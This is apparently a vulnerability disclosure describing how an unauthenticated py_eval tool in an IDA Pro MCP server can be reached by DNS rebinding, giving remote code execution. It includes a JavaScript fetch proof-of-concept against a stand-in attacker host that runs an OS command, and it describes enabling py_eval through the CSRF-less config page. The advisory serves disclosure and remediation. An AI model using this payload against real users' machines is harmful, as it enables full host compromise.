IDA Pro MCP RCE Vulnerability via DNS_Rebinding

While reproducing the ray-project/ray ↗ vulnerability (CVE-2025-62593), I realized that the same attack model applies directly to theIDA MCP interface , which I frequently use.

Summary#

IDA Pro’s Machine Control Protocol (MCP) exposes a JSON‑RPC interface on 127.0.0.1:13337. When the py_eval tool is enabled, the MCP server will execute arbitrary Python code received in the HTTP request body.

Because the MCP endpoint lacks authentication, CORS validation, and browser‑origin protections, a malicious webpage can execute Python code on the user’s machine by abusing DNS rebinding. This results in full remote code execution (RCE) in the context of the user running IDA Pro.

This issue is similar in nature to the Ray project’s advisory: GHSA‑q279‑jhrf‑cc6v.

Impact#

A remote attacker can:

• Run arbitrary Python code with the user’s permissions
• Execute OS commands (e.g., via os.system)
• Access/modify files on disk
• Interact with IDA APIs, extract data, modify analysis, etc.
• Fully compromise the host environment

Severity: Critical (RCE)

Root Causes#

1. py_eval executes arbitrary Python code from the request body without validation.
2. MCP HTTP API accepts requests from any browser origin.
3. No authentication / tokens.
4. DNS rebinding allows remote attackers to reach 127.0.0.1.

Additional Notes#

(1) py_eval is enabled by default#

Under a standard MCP startup, py_eval becomes immediately available unless manually disabled.

(2) py_eval can also be enabled via /config.html#

Even if disabled initially, a malicious website can load:

http://127.0.0.1:13337/config.html

Then use JavaScript to toggle the py_eval checkbox, because:

• config.html lacks CSRF protection
• No origin checks block browser access

This means an attacker can remotely enable py_eval before exploiting it.

Proof of Concept (DNS Rebinding → RCE)#

Once DNS rebinding maps an attacker domain to 127.0.0.1, the following browser code achieves RCE:

fetch("http://rebind.attacker.com/mcp", {
  method: "POST",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({
    jsonrpc: "2.0",
    id: 1,
    method: "tools/call",
    params: {
      name: "py_eval",
      arguments: {
        code: "__import__('os').system('calc.exe')"
      }
    }
  })
});

This launches an OS command on the victim machine.

Recommendation#

• Disable py_eval by default
• Add an authentication token for all MCP requests
• Block browser origins (strict CORS: Access-Control-Allow-Origin: none)
• Add CSRF protection to config.html

PoC video#

Unauthenticated py_eval in MCP enables Remote Code Execution via DNS Rebinding · Issue #201 · mrexodia/ida-pro-mcp

Summary IDA Pro’s Machine Control Protocol (MCP) exposes a JSON‑RPC interface on 127.0.0.1:13337. When the py_eval tool is enabled, the MCP server will execute arbitrary Python code received in the... (github.com)